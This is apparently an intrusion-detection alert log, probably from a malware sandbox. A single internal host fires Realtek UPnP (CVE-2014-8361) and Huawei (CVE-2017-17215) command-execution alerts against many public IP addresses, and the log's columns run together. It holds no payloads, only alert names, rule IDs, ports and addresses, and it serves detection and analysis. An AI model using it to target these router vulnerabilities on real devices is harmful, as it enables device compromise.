                                      07/20/24-23:01:51.790169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3290452869192.168.2.23115.59.47.171
                                      07/20/24-23:01:25.965816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615682052869192.168.2.2345.144.124.12
                                      07/20/24-23:01:01.171532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613829652869192.168.2.23199.214.91.137
                                      07/20/24-23:01:42.688831TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23584452869192.168.2.23125.246.56.225
                                      07/20/24-23:01:48.036012TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24661252869192.168.2.2345.226.155.34
                                      07/20/24-23:01:07.062666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167637215192.168.2.23157.254.9.54
                                      07/20/24-23:01:42.915641TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615759452869192.168.2.2345.244.207.174
                                      07/20/24-23:01:41.328264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3972252869192.168.2.23213.180.197.99
                                      07/20/24-23:01:41.620386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4910852869192.168.2.2373.113.35.189
                                      07/20/24-23:00:57.222207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979637215192.168.2.23197.52.45.132
                                      07/20/24-23:01:43.475010TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613935852869192.168.2.2312.65.191.23
                                      07/20/24-23:01:12.806839TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25425852869192.168.2.23167.63.84.166
                                      07/20/24-23:01:54.277122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5542252869192.168.2.23203.184.58.202
                                      07/20/24-23:01:25.275555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4615052869192.168.2.23136.18.44.19
                                      07/20/24-23:01:02.048214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541437215192.168.2.2376.17.111.28
                                      07/20/24-23:01:08.667513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25591652869192.168.2.23132.102.141.171
                                      07/20/24-23:01:43.763925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614832652869192.168.2.2352.121.181.216
                                      07/20/24-23:00:59.178062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3403237215192.168.2.23197.67.179.143
                                      07/20/24-23:01:31.312234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4783252869192.168.2.2377.157.20.139
                                      07/20/24-23:01:47.805449TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614452452869192.168.2.23180.60.94.64
                                      07/20/24-23:01:08.572197TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24139852869192.168.2.23216.174.225.184
                                      07/20/24-23:01:08.594120TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6010452869192.168.2.2313.112.9.246
                                      07/20/24-23:02:04.520145TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615089652869192.168.2.2342.30.159.48
                                      07/20/24-23:01:53.099889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3895452869192.168.2.23162.69.127.248
                                      07/20/24-23:01:41.909668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766052869192.168.2.23102.134.118.47
                                      07/20/24-23:01:44.825081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5916252869192.168.2.2379.217.40.139
                                      07/20/24-23:01:02.079114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394037215192.168.2.23147.234.115.27
                                      07/20/24-23:01:42.772926TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615625452869192.168.2.23129.76.21.211
                                      07/20/24-23:01:08.620788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23926652869192.168.2.23185.31.200.232
                                      07/20/24-23:01:48.970191TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23412652869192.168.2.23210.32.95.217
                                      07/20/24-23:01:52.914136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4047452869192.168.2.2323.141.254.89
                                      07/20/24-23:00:57.222164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748037215192.168.2.2378.242.93.228
                                      07/20/24-23:01:46.893328TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25899252869192.168.2.2335.221.171.171
                                      07/20/24-23:01:03.175286TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615062052869192.168.2.23152.136.236.137
                                      07/20/24-23:01:47.856443TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4120452869192.168.2.2325.194.48.207
                                      07/20/24-23:02:11.743968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613757252869192.168.2.23112.84.192.59
                                      07/20/24-23:01:58.892811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4401052869192.168.2.2367.241.234.23
                                      07/20/24-23:01:58.999794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3976452869192.168.2.23154.194.235.253
                                      07/20/24-23:01:46.329268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615058852869192.168.2.23116.175.162.178
                                      07/20/24-23:01:46.929722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4055052869192.168.2.23146.185.97.186
                                      07/20/24-23:01:46.143923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24300452869192.168.2.23118.134.216.118
                                      07/20/24-23:01:42.800757TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24121052869192.168.2.23148.205.165.15
                                      07/20/24-23:01:53.428577TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615168452869192.168.2.23148.27.255.148
                                      07/20/24-23:01:45.485100TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25463852869192.168.2.2341.48.241.197
                                      07/20/24-23:01:07.016889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508837215192.168.2.2362.123.128.166
                                      07/20/24-23:00:57.221748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945637215192.168.2.2357.35.73.126
                                      07/20/24-23:01:25.715288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615574452869192.168.2.2397.193.3.141
                                      07/20/24-23:01:26.014513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615954252869192.168.2.2370.211.204.245
                                      07/20/24-23:01:44.660016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5714252869192.168.2.23163.162.88.124
                                      07/20/24-23:01:01.868178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614726252869192.168.2.23109.23.172.87
                                      07/20/24-23:01:04.637063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615485452869192.168.2.23164.236.243.93
                                      07/20/24-23:01:24.060711TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614630252869192.168.2.23146.31.217.81
                                      07/20/24-23:01:42.935667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5349052869192.168.2.2335.223.49.101
                                      07/20/24-23:01:27.677519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450437215192.168.2.2336.225.241.35
                                      07/20/24-23:01:34.043784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724837215192.168.2.2341.76.96.139
                                      07/20/24-23:01:08.655109TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25477452869192.168.2.23132.33.116.164
                                      07/20/24-23:02:06.738802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615932852869192.168.2.2312.160.102.240
                                      07/20/24-23:01:08.600114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23822652869192.168.2.23207.30.132.8
                                      07/20/24-23:01:49.329746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5354252869192.168.2.2362.188.56.156
                                      07/20/24-23:01:25.787139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4995452869192.168.2.23175.125.103.77
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852837215192.168.2.23157.194.207.76
                                      07/20/24-23:01:34.048618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134637215192.168.2.23157.167.78.225
                                      07/20/24-23:01:41.366269TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615964252869192.168.2.23186.150.2.45
                                      07/20/24-23:01:06.994337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157637215192.168.2.23216.111.45.230
                                      07/20/24-23:01:24.739204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614731052869192.168.2.23109.17.111.246
                                      07/20/24-23:01:44.944699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5390052869192.168.2.23110.40.238.120
                                      07/20/24-23:01:08.646615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25199052869192.168.2.23107.208.110.238
                                      07/20/24-23:00:59.153608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453437215192.168.2.23157.86.250.128
                                      07/20/24-23:01:08.632574TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24903052869192.168.2.2358.116.31.11
                                      07/20/24-23:01:41.263141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6033052869192.168.2.23218.206.46.127
                                      07/20/24-23:02:04.592319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721252869192.168.2.23185.12.96.106
                                      07/20/24-23:01:41.381812TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614128852869192.168.2.2318.194.44.24
                                      07/20/24-23:01:03.194002TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615293652869192.168.2.2386.74.227.91
                                      07/20/24-23:01:27.664606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133637215192.168.2.23197.45.164.41
                                      07/20/24-23:01:09.027075TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24363252869192.168.2.23188.92.250.125
                                      07/20/24-23:01:53.326732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4868652869192.168.2.2337.84.136.136
                                      07/20/24-23:01:44.945909TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4054652869192.168.2.2393.177.145.85
                                      07/20/24-23:01:32.032492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988037215192.168.2.23197.56.101.214
                                      07/20/24-23:01:27.650643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751437215192.168.2.232.228.199.145
                                      07/20/24-23:01:43.087294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4878852869192.168.2.2376.8.56.105
                                      07/20/24-23:01:10.703412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4147852869192.168.2.23185.44.122.49
                                      07/20/24-23:01:42.592736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4625852869192.168.2.23179.149.63.116
                                      07/20/24-23:00:57.220866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511237215192.168.2.23157.87.181.134
                                      07/20/24-23:01:00.633810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406637215192.168.2.2391.110.161.158
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740637215192.168.2.23157.87.175.0
                                      07/20/24-23:01:31.981855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658237215192.168.2.23197.184.167.162
                                      07/20/24-23:01:31.325400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3894252869192.168.2.2361.172.152.113
                                      07/20/24-23:01:00.651026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861437215192.168.2.23157.207.43.131
                                      07/20/24-23:01:46.109136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614067052869192.168.2.2320.63.97.204
                                      07/20/24-23:01:13.146648TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614123252869192.168.2.234.129.239.131
                                      07/20/24-23:01:42.592140TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23664452869192.168.2.2334.44.162.23
                                      07/20/24-23:01:41.566623TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615989452869192.168.2.23187.33.239.16
                                      07/20/24-23:01:41.947663TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613343452869192.168.2.23218.234.180.136
                                      07/20/24-23:01:41.299284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5477852869192.168.2.2380.104.187.148
                                      07/20/24-23:01:01.278892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3574652869192.168.2.239.91.73.111
                                      07/20/24-23:01:08.574948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3828252869192.168.2.2377.77.58.220
                                      07/20/24-23:01:45.458332TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615199052869192.168.2.2358.56.54.197
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365637215192.168.2.2341.31.171.242
                                      07/20/24-23:01:42.774505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614137452869192.168.2.235.118.234.148
                                      07/20/24-23:01:31.975330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104037215192.168.2.23197.180.73.227
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141637215192.168.2.23197.194.145.174
                                      07/20/24-23:01:44.161942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5562052869192.168.2.23213.162.26.171
                                      07/20/24-23:01:47.092270TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615731052869192.168.2.23187.119.209.224
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525837215192.168.2.23181.123.95.218
                                      07/20/24-23:01:27.650643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983037215192.168.2.2341.78.192.6
                                      07/20/24-23:01:58.688551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614947852869192.168.2.2373.49.232.192
                                      07/20/24-23:01:44.036421TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613563052869192.168.2.23163.195.26.201
                                      07/20/24-23:01:03.919195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887852869192.168.2.23162.162.162.31
                                      07/20/24-23:01:34.044417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.2341.118.41.79
                                      07/20/24-23:01:46.731900TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615618852869192.168.2.23115.176.151.108
                                      07/20/24-23:01:42.749469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4545652869192.168.2.23184.103.85.217
                                      07/20/24-23:01:54.177524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5615852869192.168.2.2369.193.122.132
                                      07/20/24-23:01:59.197251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25364652869192.168.2.2348.103.95.129
                                      07/20/24-23:01:43.147883TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615957852869192.168.2.23170.93.66.190
                                      07/20/24-23:01:46.159166TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032852869192.168.2.23111.211.116.144
                                      07/20/24-23:01:51.791706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993852869192.168.2.23142.206.118.182
                                      07/20/24-23:01:01.182969TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615976652869192.168.2.23133.66.91.121
                                      07/20/24-23:01:50.083569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25486452869192.168.2.23112.255.30.88
                                      07/20/24-23:01:42.727671TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25906052869192.168.2.2385.146.42.42
                                      07/20/24-23:01:02.095698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166637215192.168.2.23157.58.16.237
                                      07/20/24-23:01:41.420715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4126852869192.168.2.23113.1.100.136
                                      07/20/24-23:01:04.965535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498052869192.168.2.23103.179.244.2
                                      07/20/24-23:01:46.471349TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613320852869192.168.2.2368.106.199.227
                                      07/20/24-23:01:53.057359TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3855852869192.168.2.2342.29.184.117
                                      07/20/24-23:01:51.835178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615977852869192.168.2.23196.117.225.80
                                      07/20/24-23:01:31.991336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589437215192.168.2.23157.50.56.223
                                      07/20/24-23:01:52.161851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613810252869192.168.2.23208.98.159.35
                                      07/20/24-23:01:53.524729TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614711452869192.168.2.2381.22.157.142
                                      07/20/24-23:01:20.152427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395037215192.168.2.23118.213.243.211
                                      07/20/24-23:01:54.930155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5728252869192.168.2.23190.122.87.133
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839837215192.168.2.23197.247.106.185
                                      07/20/24-23:01:44.944836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5548452869192.168.2.23113.35.167.52
                                      07/20/24-23:01:27.651536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828237215192.168.2.23104.187.254.126
                                      07/20/24-23:01:42.250039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3815252869192.168.2.23136.37.204.244
                                      07/20/24-23:01:47.962852TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615964252869192.168.2.23137.109.251.204
                                      07/20/24-23:01:50.280308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5586252869192.168.2.23213.162.26.171
                                      07/20/24-23:01:40.321300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867637215192.168.2.2331.249.51.37
                                      07/20/24-23:01:44.636234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5063652869192.168.2.2331.246.229.175
                                      07/20/24-23:01:42.966322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538652869192.168.2.23118.209.219.113
                                      07/20/24-23:00:59.158278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905437215192.168.2.2341.184.89.253
                                      07/20/24-23:01:31.322288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26019252869192.168.2.2324.104.161.240
                                      07/20/24-23:01:41.318733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4149452869192.168.2.238.157.181.46
                                      07/20/24-23:01:04.039129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502637215192.168.2.23197.84.99.94
                                      07/20/24-23:01:45.202570TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615874452869192.168.2.23179.153.61.251
                                      07/20/24-23:01:51.919746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5783252869192.168.2.23135.215.110.183
                                      07/20/24-23:01:44.788688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615184652869192.168.2.2319.242.116.26
                                      07/20/24-23:01:50.332163TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24045452869192.168.2.2325.245.127.235
                                      07/20/24-23:01:57.787786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614308252869192.168.2.2395.253.23.104
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240237215192.168.2.23220.206.255.62
                                      07/20/24-23:01:44.640473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23328652869192.168.2.2312.188.189.35
                                      07/20/24-23:01:20.175900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009237215192.168.2.23165.70.37.218
                                      07/20/24-23:01:46.450130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5813852869192.168.2.23187.157.152.232
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652037215192.168.2.23197.12.118.206
                                      07/20/24-23:01:41.290518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4008652869192.168.2.2395.50.29.160
                                      07/20/24-23:01:41.358696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4329652869192.168.2.2362.203.112.129
                                      07/20/24-23:01:47.267254TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708852869192.168.2.2334.85.175.26
                                      07/20/24-23:01:14.049603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060837215192.168.2.23157.40.217.143
                                      07/20/24-23:01:50.212922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4004052869192.168.2.23152.179.89.83
                                      07/20/24-23:01:00.634497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106837215192.168.2.2341.130.229.37
                                      07/20/24-23:01:42.647416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4824652869192.168.2.2375.199.56.180
                                      07/20/24-23:01:44.302645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24411652869192.168.2.23119.167.95.17
                                      07/20/24-23:01:49.809920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5440252869192.168.2.2334.139.90.241
                                      07/20/24-23:01:21.951975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957437215192.168.2.23197.169.42.163
                                      07/20/24-23:00:57.221748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772837215192.168.2.2341.6.98.70
                                      07/20/24-23:01:58.719313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3975252869192.168.2.23149.74.6.111
                                      07/20/24-23:01:11.636425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382037215192.168.2.23197.83.57.75
                                      07/20/24-23:01:45.075399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5544452869192.168.2.2331.139.123.246
                                      07/20/24-23:01:58.822700TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4967852869192.168.2.23111.239.243.106
                                      07/20/24-23:01:44.894921TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25543252869192.168.2.23193.19.81.156
                                      07/20/24-23:01:51.441890TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5068652869192.168.2.2363.196.31.124
                                      07/20/24-23:01:40.296076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574437215192.168.2.2341.95.125.239
                                      07/20/24-23:01:01.292992TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371252869192.168.2.23184.60.97.199
                                      07/20/24-23:01:21.952782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976437215192.168.2.2341.89.247.80
                                      07/20/24-23:01:03.207719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615923652869192.168.2.2334.184.40.220
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215237215192.168.2.23157.179.86.20
                                      07/20/24-23:01:27.654173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229437215192.168.2.23126.201.61.171
                                      07/20/24-23:01:51.916672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4673252869192.168.2.2381.144.207.10
                                      07/20/24-23:01:51.743446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615287052869192.168.2.2335.152.212.38
